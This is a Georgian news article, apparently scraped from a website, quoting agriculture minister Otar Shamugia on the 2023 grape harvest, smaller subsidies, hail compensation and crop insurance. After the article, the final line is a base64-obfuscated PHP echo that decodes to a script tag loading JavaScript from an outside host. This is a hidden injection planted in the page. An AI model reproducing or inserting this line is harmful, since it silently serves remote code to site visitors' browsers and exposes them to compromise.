celsiusi
ავერსი საქკაბელი

 გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის, ოთარ შამუგიას განცხადებით, თითოეული მევენახის ყურძენი სრულად იქნება დაბინავებული. მან ჟურნალისტებთან "რთველი 2023" შეაფასა და ყველა მევენახეს დაზღვევის პროგრამის გამოყენებისკენ მოუწოდა.

„ჩვენთვის მნიშვნელოვანია, ხელი შევუწყოთ ჩვენს მევენახეებს, მეღვინეებს და ამისთვის სახელმწიფო ყველაფერს აკეთებს. სწორედ ამის შედეგია ის, რომ ღვინის ექსპორტი ყოველწლიურად მზარდია. ჩვენ შარშან რეკორდული რაოდენობის ღვინის ექსპორტი განვახორციელეთ. წელს, 9 თვის მონაცემებით, ზრდის საკმაოდ კარგ დინამიკას ვინარჩუნებთ. სწორედ ეს არის იმის საწინდარი, რომ ქართულ ღვინოზე მოთხოვნა გაიზარდოს და შემდგომში, ბაზარმა თვითონ დაარეგულიროს ეს საკითხი, რომ სახელმწიფოს აღარ მოუწიოს სუბსიდიის სახით ჩარევა. წელს სუბსიდიის მოცულობა შემცირდა. შარშან იყო 35 თეთრი და წელს 20 თეთრის ფარგლებში განხორციელდა სუბსიდირება. კახეთში რთველი ფაქტობრივად, დასასრულისკენ მიდის. თითოეული მევენახის ყურძენი სრულად იქნება დაბინავებული. 210 ათას ტონამდე ყურძენი უკვე არის გადამუშავებული. იყო გამოწვევები სტიქიის სახით, დაახლოებით 6 ათას ჰექტრამდე ვენახი დაისეტყვა. ჩვენ ვდგავართ ჩვენი მევენახეების გვერდით და მათ ვეხმარებით ჰექტარზე 3500 ლარის ოდენობით, სადაც სრულად იქნა ვენახი დასეტყვილი. მინდა მოვუწოდო ყველას დაზღვევის პროგრამის გამოყენებისკენ. ეს არის ერთადერთი სწორი გზა იმისთვის, რომ ჩვენ ეს რისკები დავაზღვიოთ. თუმცა, არის ობიექტური მიზეზებიც, ზოგ შემთხვევაში მიწის რეგისტრაცია და სხვა, რომლის გამოც მევენახეები დაზღვევას ვერ ახერხებენ, ამიტომაც რადგან სტიქია ასეთი მასშტაბური იყო, გადაწყვეტილება მივიღეთ, მევენახეებს დავეხმაროთ, რომ მათ წარმოების გაგრძელება შეძლონ და შემდეგ წელს უკეთესი მოსავალი მიიღონ“,-განაცხადა შამუგიამ.

გარდა ამისა, მინისტრის განმარტებით, რაჭაში რთველი აქტიურ ფაზაშია და 300 ტონაზე მეტი ყურძენი გადამუშავდა.

260
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");